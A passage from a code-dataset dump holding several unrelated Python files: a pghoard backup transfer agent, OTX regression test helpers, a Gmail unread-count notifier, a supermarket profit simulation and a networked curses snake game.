Thread, Lock\nimport logging\nimport os\nimport time\n\n_STATS_LOCK = Lock()\n_last_stats_transmit_time = 0\n\n\nclass TransferAgent(Thread):\n def __init__(self, config, compression_queue, transfer_queue, stats,\n shared_state_dict):\n super().__init__()\n self.log = logging.getLogger(\"TransferAgent\")\n self.config = config\n self.stats = stats\n self.compression_queue = compression_queue\n self.transfer_queue = transfer_queue\n self.running = True\n self.state = shared_state_dict\n self.site_transfers = {}\n self.log.debug(\"TransferAgent initialized\")\n\n def set_state_defaults_for_site(self, site):\n if site not in self.state:\n EMPTY = {\"data\": 0, \"count\": 0, \"time_taken\": 0.0, \"failures\": 0,\n \"xlogs_since_basebackup\": 0, \"last_success\": None}\n\n def defaults():\n return {\"basebackup\": EMPTY.copy(), \"xlog\": EMPTY.copy(), \"timeline\": EMPTY.copy()}\n\n self.state[site] = {\n \"upload\": defaults(),\n \"download\": defaults(),\n \"metadata\": defaults(),\n \"list\": defaults(),\n }\n\n def get_object_storage(self, site_name):\n storage = self.site_transfers.get(site_name)\n if not storage:\n storage_config = get_object_storage_config(self.config, site_name)\n storage = get_transfer(storage_config)\n self.site_transfers[site_name] = storage\n\n return storage\n\n @staticmethod\n def form_key_path(file_to_transfer):\n name = os.path.basename(file_to_transfer[\"local_path\"])\n return os.path.join(file_to_transfer[\"path_prefix\"],\n file_to_transfer[\"site\"],\n file_to_transfer[\"filetype\"],\n name)\n\n def transmit_statsd_metrics(self):\n \"\"\"\n Keep statsd updated about how long time ago each filetype was successfully uploaded.\n Transmits max once per ten seconds, regardless of how many threads are running.\n \"\"\"\n global _last_stats_transmit_time # pylint: disable=global-statement\n with _STATS_LOCK:\n if time.time() - _last_stats_transmit_time < 10.0:\n return\n\n for site in self.state:\n for filetype, prop in self.state[site][\"upload\"].items():\n if prop[\"last_success\"]:\n self.stats.gauge(\n \"pghoard.last_upload_age\",\n time.time() - prop[\"last_success\"],\n tags={\n \"site\": site,\n \"type\": filetype,\n }\n )\n _last_stats_transmit_time = time.time()\n\n def run(self):\n while self.running:\n self.transmit_statsd_metrics()\n try:\n file_to_transfer = self.transfer_queue.get(timeout=1.0)\n except Empty:\n continue\n if file_to_transfer[\"type\"] == \"QUIT\":\n break\n self.log.debug(\"Starting to %r %r, size: %r\",\n file_to_transfer[\"type\"], file_to_transfer[\"local_path\"],\n file_to_transfer.get(\"file_size\", \"unknown\"))\n file_to_transfer.setdefault(\"path_prefix\", self.config[\"path_prefix\"])\n start_time = time.time()\n key = self.form_key_path(file_to_transfer)\n oper = file_to_transfer[\"type\"].lower()\n oper_func = getattr(self, \"handle_\" + oper, None)\n if oper_func is None:\n self.log.warning(\"Invalid operation %r\", file_to_transfer[\"type\"])\n continue\n site = file_to_transfer[\"site\"]\n filetype = file_to_transfer[\"filetype\"]\n\n result = oper_func(site, key, file_to_transfer)\n\n # increment statistics counters\n self.set_state_defaults_for_site(site)\n oper_size = file_to_transfer.get(\"file_size\", 0)\n if result[\"success\"]:\n filename = os.path.basename(file_to_transfer[\"local_path\"])\n if oper == \"upload\":\n if filetype == \"xlog\":\n self.state[site][oper][\"xlog\"][\"xlogs_since_basebackup\"] += 1\n elif filetype == \"basebackup\":\n # reset corresponding xlog stats at basebackup\n self.state[site][oper][\"xlog\"][\"xlogs_since_basebackup\"] = 0\n\n self.stats.gauge(\n \"pghoard.xlogs_since_basebackup\",\n self.state[site][oper][\"xlog\"][\"xlogs_since_basebackup\"],\n tags={\"site\": site})\n\n self.state[site][oper][filetype][\"last_success\"] = time.time()\n self.state[site][oper][filetype][\"count\"] += 1\n self.state[site][oper][filetype][\"data\"] += oper_size\n self.stats.gauge(\n \"pghoard.total_upload_size\",\n self.state[site][oper][filetype][\"data\"],\n tags={\n \"type\": filetype,\n \"site\": site,\n })\n self.state[site][oper][filetype][\"time_taken\"] += time.time() - start_time\n self.state[site][oper][filetype][\"latest_filename\"] = filename\n else:\n self.state[site][oper][filetype][\"failures\"] += 1\n\n if oper == \"upload\":\n self.stats.increase(\n \"pghoard.upload_size\",\n inc_value=oper_size,\n tags={\n \"result\": \"ok\" if result[\"success\"] else \"failed\",\n \"type\": filetype,\n \"site\": site,\n })\n\n # push result to callback_queue if provided\n if result.get(\"call_callback\", True) and file_to_transfer.get(\"callback_queue\"):\n file_to_transfer[\"callback_queue\"].put(result)\n\n self.log.info(\"%r %stransfer of key: %r, size: %r, took %.3fs\",\n file_to_transfer[\"type\"],\n \"FAILED \" if not result[\"success\"] else \"\",\n key, oper_size, time.time() - start_time)\n\n self.log.debug(\"Quitting TransferAgent\")\n\n def handle_list(self, site, key, file_to_transfer):\n try:\n storage = self.get_object_storage(site)\n items = storage.list_path(key)\n file_to_transfer[\"file_size\"] = len(repr(items)) # approx\n return {\"success\": True, \"items\": items, \"opaque\": file_to_transfer.get(\"opaque\")}\n except FileNotFoundFromStorageError as ex:\n self.log.warning(\"%r not found from storage\", key)\n return {\"success\": False, \"exception\": ex, \"opaque\": file_to_transfer.get(\"opaque\")}\n except Exception as ex: # pylint: disable=broad-except\n self.log.exception(\"Problem happened when retrieving metadata: %r, %r\", key, file_to_transfer)\n self.stats.unexpected_exception(ex, where=\"handle_list\")\n return {\"success\": False, \"exception\": ex, \"opaque\": file_to_transfer.get(\"opaque\")}\n\n def handle_metadata(self, site, key, file_to_transfer):\n try:\n storage = self.get_object_storage(site)\n metadata = storage.get_metadata_for_key(key)\n file_to_transfer[\"file_size\"] = len(repr(metadata)) # approx\n return {\"success\": True, \"metadata\": metadata, \"opaque\": file_to_transfer.get(\"opaque\")}\n except FileNotFoundFromStorageError as ex:\n self.log.warning(\"%r not found from storage\", key)\n return {\"success\": False, \"exception\": ex, \"opaque\": file_to_transfer.get(\"opaque\")}\n except Exception as ex: # pylint: disable=broad-except\n self.log.exception(\"Problem happened when retrieving metadata: %r, %r\", key, file_to_transfer)\n self.stats.unexpected_exception(ex, where=\"handle_metadata\")\n return {\"success\": False, \"exception\": ex, \"opaque\": file_to_transfer.get(\"opaque\")}\n\n def handle_download(self, site, key, file_to_transfer):\n try:\n storage = self.get_object_storage(site)\n\n content, metadata = storage.get_contents_to_string(key)\n file_to_transfer[\"file_size\"] = len(content)\n # Note that here we flip the local_path to mean the target_path\n self.compression_queue.put({\n \"blob\": content,\n \"callback_queue\": file_to_transfer[\"callback_queue\"],\n \"local_path\": file_to_transfer[\"target_path\"],\n \"metadata\": metadata,\n \"opaque\": file_to_transfer.get(\"opaque\"),\n \"site\": site,\n \"type\": \"DECOMPRESSION\",\n })\n return {\"success\": True, \"call_callback\": False}\n except FileNotFoundFromStorageError as ex:\n self.log.warning(\"%r not found from storage\", key)\n return {\"success\": False, \"exception\": ex, \"opaque\": file_to_transfer.get(\"opaque\")}\n except Exception as ex: # pylint: disable=broad-except\n self.log.exception(\"Problem happened when downloading: %r, %r\", key, file_to_transfer)\n self.stats.unexpected_exception(ex, where=\"handle_download\")\n return {\"success\": False, \"exception\": ex, \"opaque\": file_to_transfer.get(\"opaque\")}\n\n def handle_upload(self, site, key, file_to_transfer):\n try:\n storage = self.get_object_storage(site)\n unlink_local = False\n if \"blob\" in file_to_transfer:\n storage.store_file_from_memory(key, file_to_transfer[\"blob\"],\n metadata=file_to_transfer[\"metadata\"])\n else:\n # Basebackups may be multipart uploads, depending on the driver.\n # Swift needs to know about this so it can do possible cleanups.\n multipart = file_to_transfer[\"filetype\"] == \"basebackup\"\n try:\n storage.store_file_from_disk(key, file_to_transfer[\"local_path\"],\n metadata=file_to_transfer[\"metadata\"],\n multipart=multipart)\n unlink_local = True\n except LocalFileIsRemoteFileError:\n pass\n if unlink_local:\n try:\n self.log.debug(\"Deleting file: %r since it has been uploaded\", file_to_transfer[\"local_path\"])\n os.unlink(file_to_transfer[\"local_path\"])\n metadata_path = file_to_transfer[\"local_path\"] + \".metadata\"\n with suppress(FileNotFoundError):\n os.unlink(metadata_path)\n except Exception as ex: # pylint: disable=broad-except\n self.log.exception(\"Problem in deleting file: %r\", file_to_transfer[\"local_path\"])\n self.stats.unexpected_exception(ex, where=\"handle_upload_unlink\")\n return {\"success\": True, \"opaque\": file_to_transfer.get(\"opaque\")}\n except Exception as ex: # pylint: disable=broad-except\n if file_to_transfer.get(\"retries\", 0) > 0:\n self.log.exception(\"Problem in moving file: %r, need to retry\", file_to_transfer[\"local_path\"])\n # Ignore the exception the first time round as some object stores have frequent Internal Errors\n # and the upload usually goes through without any issues the second time round\n self.stats.unexpected_exception(ex, where=\"handle_upload\")\n else:\n self.log.warning(\"Problem in moving file: %r need to retry\", file_to_transfer[\"local_path\"])\n # Sleep for a bit to avoid busy looping\n time.sleep(0.5)\n\n file_to_transfer[\"retries\"] = file_to_transfer.get(\"retries\", 0) + 1\n if file_to_transfer[\"retries\"] > self.config[\"upload_retries_warning_limit\"]:\n create_alert_file(self.config, \"upload_retries_warning\")\n\n self.transfer_queue.put(file_to_transfer)\n return {\"success\": False, \"call_callback\": False, \"exception\": ex}\n","sub_path":"pghoard/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":12779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"381763680","text":"# Copyright (C) 2021 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions\n# and limitations under the License.\n\nimport json\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Union\n\nfrom otx.api.entities.model_template import ModelTemplate\n\nTEST_TYPES = [\"train\", \"export\", \"deploy\", \"nncf\", \"pot\"]\nTASK_TYPES = [\n \"classification\",\n \"detection\",\n \"semantic_segmentation\",\n \"instance_segmentation\",\n \"action_classification\",\n \"action_detection\",\n \"anomaly\",\n]\nTRAIN_TYPES = [\"supervised\", \"semi_supervised\", \"self_supervised\", \"class_incr\", \"tiling\"]\nLABEL_TYPES = [\"multi_class\", \"multi_label\", \"h_label\", \"supcon\"]\n\nREGRESSION_TEST_EPOCHS = \"10\"\n\nANOMALY_DATASET_CATEGORIES = [\n \"bottle\",\n \"cable\",\n \"capsule\",\n \"carpet\",\n \"grid\",\n \"hazelnut\",\n \"leather\",\n \"metal_nut\",\n \"pill\",\n \"screw\",\n \"tile\",\n \"toothbrush\",\n \"transistor\",\n \"wood\",\n \"zipper\",\n]\n\n\nTIME_LOG = {\n \"train_time\": \"Train + val time (sec.)\",\n \"infer_time\": \"Infer time (sec.)\",\n \"export_time\": \"Export time (sec.)\",\n \"export_eval_time\": \"Export eval time (sec.)\",\n \"deploy_time\": \"Deploy time (sec.)\",\n \"deploy_eval_time\": \"Deploy eval time (sec.)\",\n \"nncf_time\": \"NNCF time (sec.)\",\n \"nncf_eval_time\": \"NNCF eval time (sec.)\",\n \"pot_time\": \"POT time (sec.)\",\n \"pot_eval_time\": \"POT eval time (sec.)\",\n}\n\n\ndef get_result_dict(task_type: str) -> Dict[str, Any]:\n result_dict = {task_type: {}}\n if \"anomaly\" not in task_type:\n for label_type in LABEL_TYPES:\n result_dict[task_type][label_type] = {}\n for train_type in TRAIN_TYPES:\n result_dict[task_type][label_type][train_type] = {}\n for test_type in TEST_TYPES:\n result_dict[task_type][label_type][train_type][test_type] = []\n else:\n for test_type in TEST_TYPES:\n result_dict[task_type][test_type] = {}\n for category in ANOMALY_DATASET_CATEGORIES:\n result_dict[task_type][test_type][category] = []\n\n return result_dict\n\n\ndef load_regression_config(otx_dir: str) -> Dict[str, Any]:\n \"\"\"Load regression config from path.\n\n Args:\n otx_dir (str): The path of otx root directory\n\n Returns:\n Dict[str, Any]: The dictionary that includes data roots\n \"\"\"\n root_path = Path(otx_dir)\n with open(root_path / (\"tests/regression/regression_config.json\"), \"r\") as f:\n reg_config = json.load(f)\n return reg_config\n\n\ndef load_regression_configuration(\n otx_dir: str, task_type: str, train_type: str = \"\", label_type: str = \"\"\n) -> Dict[str, Union[str, int, float]]:\n \"\"\"Load dataset path according to task, train, label types.\n\n Args:\n otx_dir (str): The path of otx root directoy\n task_type (str): [\"classification\", \"detection\", \"instance segmentation\", \"semantic segmentation\",\n \"action_classification\", \"action_detection\", \"anomaly\"]\n train_type (str): [\"supervised\", \"semi_supervised\", \"self_supervised\", \"class_incr\"]\n label_type (str): [\"multi_class\", \"multi_label\", \"h_label\", \"supcon\"]\n\n Returns:\n Dict[str, Union[int, float]]: The dictionary that includes model criteria\n \"\"\"\n reg_config = load_regression_config(otx_dir)\n result: Dict[str, Union[str, int, float]] = {\n \"data_path\": \"\",\n \"model_criteria\": 0,\n }\n\n if \"anomaly\" not in task_type:\n if train_type == \"\" or label_type == \"\":\n raise ValueError()\n result[\"regression_criteria\"] = reg_config[\"regression_criteria\"][task_type][train_type][label_type]\n result[\"kpi_e2e_train_time_criteria\"] = reg_config[\"kpi_e2e_train_time_criteria\"][task_type][train_type][\n label_type\n ]\n result[\"kpi_e2e_eval_time_criteria\"] = reg_config[\"kpi_e2e_eval_time_criteria\"][task_type][train_type][\n label_type\n ]\n result[\"data_path\"] = reg_config[\"data_path\"][task_type][train_type][label_type]\n else:\n result[\"regression_criteria\"] = reg_config[\"regression_criteria\"][task_type]\n result[\"kpi_e2e_train_time_criteria\"] = reg_config[\"kpi_e2e_train_time_criteria\"][task_type]\n result[\"kpi_e2e_eval_time_criteria\"] = reg_config[\"kpi_e2e_eval_time_criteria\"][task_type]\n result[\"data_path\"] = reg_config[\"data_path\"][task_type]\n\n return result\n\n\ndef get_template_performance(results: List[Dict], template: ModelTemplate):\n \"\"\"Get proper template performance inside of performance list.\"\"\"\n performance = None\n for result in results:\n template_name = list(result.keys())[0]\n if template_name == template.name:\n performance = result\n break\n if performance is None:\n raise ValueError(\"Performance is None.\")\n return performance\n","sub_path":"tests/regression/regression_test_helpers.py","file_name":"regression_test_helpers.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"555238658","text":"from __future__ import print_function\nimport httplib2\nimport os\nimport pprint\nfrom apiclient import discovery\nimport oauth2client\nfrom oauth2client import client\nfrom oauth2client import tools\n\ntry:\n import argparse\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\nexcept ImportError:\n flags = None\n\nSCOPES = 'https://www.googleapis.com/auth/gmail.readonly'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'py3status gmail notficator'\nhome_dir = os.path.expanduser('~')\ncredential_dir = os.path.join(home_dir, '.credentials')\n\n\ndef get_credentials(client):\n\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n\n credential_path = os.path.join(credential_dir,\n client)\n\n store = oauth2client.file.Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n if flags:\n credentials = tools.run_flow(flow, store, flags)\n else: # Needed only for python <2.6\n credentials = tools.run(flow, store)\n print('Storing credentials to ' + credential_path)\n return credentials\n\ndef main():\n\n store_path = \"/tmp/py3status-gmail/\" # path where results will be saved\n if not os.path.exists(store_path): \n os.makedirs(store_path)\n\n accounts = os.listdir(credential_dir) # \n for account in accounts:\n\n credentials = get_credentials(account)\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n\n results = service.users().labels().list(userId='me').execute()\n labels = results.get('labels', [])\n unreads= service.users().labels().get(userId='me', id='UNREAD').execute()\n\n store = open(store_path+account+'.res', 'w')\n store.truncate()\n store.write(str(unreads['messagesTotal']))\n\nif __name__ == '__main__':\n main()\n","sub_path":"py3status-gmail/api_get_data.py","file_name":"api_get_data.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"625147806","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport threading\n\n\nprice_level = {'level1': 5,\n 'level2': 15,\n 'level3': 30,\n 'level4': 50,\n 'level5': 80}\n\nincome_level = {\"low\": 300,\n \"median\": 1000,\n \"high\": 2000}\n\nlevel_style = {'level1': '.',\n 'level2': 'o',\n 'level3': '^',\n 'level4': '*',\n 'level5': '|'}\n\nlevel_color = {'level1': 'red',\n 'level2': 'blue',\n 'level3': 'green',\n 'level4': 'grey',\n 'level5': 'orange'}\n\n\n\nclass Market:\n def __init__(self, location, level:str, size:int):\n '''\n Each Market object represents the basic info and the profit of the corresponding market.\n :param location: the location coordinate of a certain market\n :param level: the price level of the Market. From level1 to level5. The higher the level, the more expensive it is.\n :param size: the maximum capacity of the market\n '''\n self.location = location\n self.buy_price = price_level[level]\n self.sell_price = self.buy_price * 2\n self.size = size\n self.level = level\n def getCost(self):\n '''\n :return: the total cost for running the store, including stock with goods and hiring fee.\n '''\n return self.buy_price * self.size * 1.2\n def getProfit(self, cust_num):\n '''\n :param cust_num: the number of the customer that will purchase in this market\n :return: the total profit for running this store (calculate by income - cost)\n '''\n return self.sell_price * min(cust_num,self.size) - self.getCost()\n\n\nclass Resident:\n def __init__(self, level:str, home_loc):\n '''\n :param level: the income level for the resident, could be low, median or high.\n :param home_loc: the coordinate of the resident's home\n '''\n self.income = income_level[level]\n self.home_loc = home_loc\n def getBudget(self):\n '''\n :return: the maximum shopping budget that the resident can afford.\n '''\n return self.income/10\n def getDistance(self, location):\n '''\n :param location: the location coordinate of a certain market\n :return: the distance between the resident's home to the market\n '''\n return math.sqrt(np.square(self.home_loc[0] - location[0]) + np.square(self.home_loc[1] - location[1]))\n def purchase(self, price, location, size):\n '''\n :param price: the average selling price of a certain market\n :param location: the location coordinate of a certain market\n :param size: the maximum capacity of a certain market\n :return: whether the resident would purchase in the certain market. \"True\" represents the resident will purchase goods, vice versa.\n '''\n if self.getBudget() >= price and self.getDistance(location) <= math.sqrt(size):\n return True\n else:\n return False\n\nclass Company:\n def __init__(self,budget:int):\n '''\n :param budget: the total budget of this company\n '''\n self.budget = budget\n def getMaxamount(self,Market):\n '''\n Given a certain Market object, we will calculate according to the company's budget, how many markets with the same size and level can be started at most.\n :param Market: a certain market object\n :return: the upper limitation of the number of the markets that could be started by the company.\n '''\n return self.budget/Market.getCost()\n\n\ndef getMap(row:int, col:int, rich_area:list, poor_area:list):\n '''\n This function allow users to create a city map by input the city size and the location of wealthy area and poor area.\n :param row: The rows of the entire city\n :param col: The columns of the entire city\n :param rich_area: a list, contains the start point and end point of wealthy area.\n :param poor_area: a list, contains the start point and end point of poor area.\n :return: a map of a city\n >>> getMap((1, 1, [[0, 0], [0, 0]], [[0, 0], [0, 0]]))\n [[0]]\n >>> getMap(getMap(4, 5, [[1, 2], [3, 4]], [[7, 8], [8, 8]]))\n [[1 1 1 1 1]\n [1 1 2 2 2]\n [1 1 2 2 2]\n [1 1 2 2 2]]\n >>> test_map = getMap(getMap(70, 80, [[1, 2], [3, 4]], [[7, 8], [8, 8]]))\n >>> test_map.size\n 5600\n '''\n map = np.ones([row, col], dtype=int)\n rich_start = rich_area[0]\n rich_end = rich_area[1]\n poor_start = poor_area[0]\n poor_end = poor_area[1]\n map[rich_start[0]:rich_end[0]+1,rich_start[1]:rich_end[1]+1] = 2\n map[poor_start[0]:poor_end[0]+1,poor_start[1]:poor_end[1]+1] = 0\n return map\n\n\ndef getResidents(map):\n '''\n Assume that we already have a map of a city, this function will generate a list of Resident according to your map.\n :param map: The map of the city\n :return: a list of Resident objects\n >>> test_map = getMap(10, 10, [[0, 0], [0, 0]], [[0, 0], [0, 0]])\n >>> test_Resident = getResidents(test_map)\n >>> len(test_Resident) == test_map.size\n True\n '''\n resident_list = []\n map_row = map.shape[0]\n map_col = map.shape[1]\n for i in range(0,map_row):\n row_list = []\n for j in range(0,map_col):\n if map[i][j] == 2:\n resident = Resident('high',(i,j))\n row_list.append(resident)\n elif map[i][j] == 1:\n resident = Resident('median',(i,j))\n row_list.append(resident)\n else:\n resident = Resident('low', (i, j))\n row_list.append(resident)\n resident_list.append(row_list)\n return resident_list\n\n\ndef randomStoreLoc(map,amount:int,uniform:bool):\n '''\n Randomly generate the location of the markets on the map.\n :param map: city map\n :param amount: the number of markets to be generated\n :param uniform: bool type, true means make the stores uniform distributed among the city\n :return: a list of market location\n >>> test_map = getMap(10, 10, [[0, 0], [0, 0]], [[0, 0], [0, 0]])\n >>> test_map.size\n 100\n >>> test_Resident = getResidents(test_map)\n >>> test_market = Market((0, 0), \"level2\", 40)\n >>> amount = 40\n >>> store_list = randomStoreLoc(test_map,amount,True)\n >>> len(store_list)\n 40\n '''\n map_row = map.shape[0]\n map_col = map.shape[1]\n map_size = map.size\n store_loc_list = []\n if uniform == False:\n for store in range(amount):\n store_row = np.random.randint(low=0, high=map_row, size=1, dtype=int)\n store_col = np.random.randint(low=0, high=map_col, size=1, dtype=int)\n store_loc = [store_row[0],store_col[0]]\n store_loc_list.append(store_loc)\n else:\n interval = int(map_size / (amount-1))\n loc_num = np.arange(0,map_size,interval)\n for num in loc_num:\n if (num+1)%map_row == 0:\n store_row = int(((num+1)/map_row)-1)\n store_col = map_col-1\n store_loc = [store_row, store_col]\n store_loc_list.append(store_loc)\n else:\n store_row = int((num+1)/map_row)\n store_col = num - store_row * map_col\n store_loc = [store_row, store_col]\n store_loc_list.append(store_loc)\n\n return store_loc_list\n\ndef getMarkets(store_loc_list,level,size):\n '''\n Given a list of store location, this function will automatically generate corresponding Market class\n :param store_loc_list: the list of store location\n :param level: the level of stores to be generated\n :param size: the size of markets\n :return: a list of Market objects\n >>> test_map = getMap(10, 10, [[0, 0], [0, 0]], [[0, 0], [0, 0]])\n >>> test_map.size\n 100\n >>> test_Resident = getResidents(test_map)\n >>> test_market = Market((0, 0), \"level2\", 40)\n >>> amount = 50\n >>> store_list = randomStoreLoc(test_map,amount,True)\n >>> len(getMarkets(store_list), \"level2\", 40)\n 50\n '''\n market_list = []\n for loc in store_loc_list:\n new_market = Market(loc,level,size)\n market_list.append(new_market)\n return market_list\n\n\ndef getCustAmount(Market:object,resident_list:list):\n \"\"\"\n For specific market, given a list of Resident objects, this function will calculate the amount of residents that will purchase in this market.\n :param Market: the target market object\n :param resident_list: the list of Resident object\n :return: the number of customers\n >>> test_map = getMap(10, 10, [[0, 0], [0, 0]], [[0, 0], [0, 0]])\n >>> test_Resident = getResidents(test_map)\n >>> test_market = Market((0, 0), \"level2\", 40)\n >>> getCustAmount(test_market, test_resident) <= test_map.size\n True\n \"\"\"\n cust_num = 0\n for row in resident_list:\n for resident in row:\n if resident.purchase(Market.sell_price, Market.location, Market.size) == True:\n cust_num += 1\n return cust_num\n\ndef getTotalProfit(market_list, resident_list):\n '''\n Given a list of Market object and a list of Resident object, this function will calculate the total profit of all the markets\n :param market_list: a list of Market object\n :param resident_list: a list of Resident object\n :return: the amount of total profit\n '''\n total_profit = 0\n for market in market_list:\n cust_num = getCustAmount(market,resident_list)\n profit = market.getProfit(cust_num)\n total_profit += profit\n return total_profit\n\ndef sizeProfitPlot(map,resident,company,possible_size,city_type):\n '''\n This function will generate a line plot which demonstrate the relationship between the size of supermarket and the total profit.\n :param map: The city map\n :param resident: a list of resident object\n :param company: a company object\n :param possible_size: a list of possible size\n :param city_type: the type of the city, used to generated the name of the x-axis of the plot.\n :return:\n '''\n plt.cla\n for level in price_level:\n profit = []\n for size in possible_size:\n test_market = Market((0, 0), level, size)\n random_loc = randomStoreLoc(map, company.getMaxamount(test_market), True)\n rand_markets = getMarkets(random_loc, level, size)\n profit.append(getTotalProfit(rand_markets, resident))\n plt.title('Relationship Between Size and Profit')\n plt.plot(possible_size,profit,marker=level_style[level],color=level_color[level],label=level)\n plt.xlabel('Size of market(persons)')\n plt.ylabel('Profit($)')\n plt.legend()\n plt.savefig(city_type)\n plt.close('all')\n\ndef levelProfitPlot(map,resident,company,size):\n '''\n Given a map and a list of residents, this function will generate a plot that demonstrated the relationship between the distribution style, market level and the total profit.\n :param map: The map of the city\n :param resident: a list of Resident object\n :param company: a company object\n :param size: the size of the market\n :return:\n '''\n plt.cla\n level_list = price_level.keys()\n profit_uni = []\n for level in level_list:\n test_market = Market((0, 0), level, size)\n loc = randomStoreLoc(map, int(company.getMaxamount(test_market)), True)\n markets_list = getMarkets(loc, level, size)\n profit_uni.append(getTotalProfit(markets_list, resident))\n plt.title('The Influence of Market Distribution')\n plt.plot(level_list, profit_uni, \"g+-\", label=\"Uniform Distribution\")\n profit_rand = []\n\n def random_test(level, size, times):\n pro_sum = 0\n for count in range(times):\n test_market = Market((0, 0), level, size)\n loc = randomStoreLoc(map, int(company.getMaxamount(test_market)), False)\n markets_list = getMarkets(loc, level, size)\n pro_sum += getTotalProfit(markets_list, resident)\n avg_pro = pro_sum/times\n return avg_pro\n\n for level in level_list:\n profit_rand.append(random_test(level,size,100))\n plt.plot(level_list, profit_rand, 'r^-', label=\"Random Distribution\")\n plt.xlabel('Level Of Market')\n plt.ylabel('Total Profit($)')\n plt.legend()\n plt.savefig('MarkerDistributionVsProfit')\n plt.close('all')\n\n\ndef main():\n\n companyA = Company(15000)\n city_row = 100\n city_col = 100\n cityMap = getMap(city_row, city_col, [[0, 0], [40, 40]], [[60, 60], [99, 99]])\n # Generate a city (average income) map with 100 rows and 100 columns, rich area is from (0,0) to (40,40), low-income area is from (60,60) to (99,99)\n rich_cityMap = getMap(city_row, city_col, [[0, 0], [70, 70]], [[90, 90], [99, 99]])\n poor_cityMap = getMap(city_row, city_col, [[0, 0], [10, 10]], [[30, 30], [99, 99]])\n cityResident = getResidents(cityMap)\n rich_cityResident = getResidents(rich_cityMap)\n poor_cityResident = getResidents(poor_cityMap)\n\n\n # simulation for hypothesis one:\n # The best size and level of supermarkets to be started is related to the population and income level\n possible_size = range(10,80,10)\n sizeProfitPlot(cityMap,cityResident,companyA,possible_size,\"averageCity\")\n sizeProfitPlot(rich_cityMap, rich_cityResident, companyA, possible_size, \"richCity\")\n sizeProfitPlot(poor_cityMap, poor_cityResident, companyA, possible_size, \"poorCity\")\n\n\n # simulation for hypothesis two:\n # simulation for random distribution and even distribution\n levelProfitPlot(cityMap,cityResident,companyA,40)\n\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"Market_Profit.py","file_name":"Market_Profit.py","file_ext":"py","file_size_in_byte":13712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"385422904","text":"import curses\nimport time\nimport random\nimport socket\n\n\nstartlength = 5\ngrowlength =1 \nspeed = {'Easy':0.1,'Medium':0.06, 'Hard':0.04}\ndifficulty = 'Medium'\naccelration = True\nscreen = curses.initscr() # initialise the screen\nscreen.keypad(1) #take input from keyboard\nh,w= screen.getmaxyx() #the screen dimensions\n\ndef connect_server():\n\n global s\n s = socket.socket()\n host = '10.130.48.106'\n port = 5554\n\n s.connect((host,port))\n\ndef parse_data():\n data = s.recv(1024)\n reply = data[:].decode(\"utf-8\")\n print(\"look here\", reply)\n split_data = reply.split(',') # it splits the data into two parts of ydata and xdata strings\n y_data = int(split_data[0].strip('[]')) # it strips any non numerical character and converts into int\n x_data = int(split_data[1].strip('[]'))\n\n screen.addch(y_data,x_data, curses.ACS_CKBOARD) # displays it on screen\n\n\ndef game():\n screen.clear()#clear the screen in the start\n curses.start_color() #black background\n curses.curs_set(0)# cursor visibility zero\n curses.noecho() #does not echo the keys pressed\n screen.border() # sets a border\n screen.nodelay(1)# so we dont have to wait for anything to happen\n head = [random.randrange(1,h-1),random.randrange(1,w-1)] # random starting postion of snake\n body = [head[:]]*startlength\n \n gameover = False\n direction = 0 # 0: right, 1: down, 2: left, 3: up \n q=0\n deadcell = body[-1][:]\n foodmade = False\n\n global s\n\n while not gameover:\n\n while not foodmade:\n y,x = random.randrange(1, h-1),random.randrange(1,w-1)\n if screen.inch(y,x) == ord(' '):\n screen.addch(y,x,ord('$'))\n foodmade = True\n\n if deadcell not in body:\n screen.addch(deadcell[0],deadcell[1],' ')\n \n action = screen.getch()\n if action == curses.KEY_UP and direction != 1:\n direction =3\n if action == curses.KEY_DOWN and direction != 3:\n direction =1\n if action == curses.KEY_LEFT and direction != 0:\n direction =2\n if action == curses.KEY_RIGHT and direction != 2:\n direction =0\n\n screen.addch(head[0],head[1], curses.ACS_CKBOARD)\n\n# the code here receives the information about the other snakes and display them\n\n\n parse_data() #reads the data and puts it on screen\n\n send_p_data = \"the enemy snake is at \" + str(head)\n s.send(str.encode(send_p_data))\n\n\n\n if direction == 0:\n head[1] += 1\n if direction == 2:\n head[1] -= 1\n if direction == 1:\n head[0] += 1\n if direction == 3:\n head[0] -= 1\n \n deadcell = body[-1][:]\n for z in range(len(body)-1,0,-1):\n body[z] = body[z-1][:]\n\n body[0] = head[:]\n\n #check for border and collions\n if screen.inch(head[0],head[1]) != ord(' '):\n if screen.inch(head[0],head[1]) == ord('$'):\n foodmade = False\n\n for i in range(growlength):\n body.append(body[-1])\n\n else:\n gameover = True\n screen.refresh()\n if not accelration:\n time.sleep(speed[difficulty])\n else:\n time.sleep(15.*speed[difficulty]/len(body))\n\n\n screen.clear()\n screen.nodelay(0)\n message1 = \"Game Over\"\n message2 = 'Your Score is '+ str(int((len(body)-startlength)/growlength))\n message3 = 'Press Space to play again'\n message4 = 'Press Enter to quit'\n message5 = 'Press M to go back to the menu'\n screen.addstr(int(h/2-1),int((w-len(message1))/2),message1)\n screen.addstr(int(h/2),int((w-len(message2))/2),message2)\n 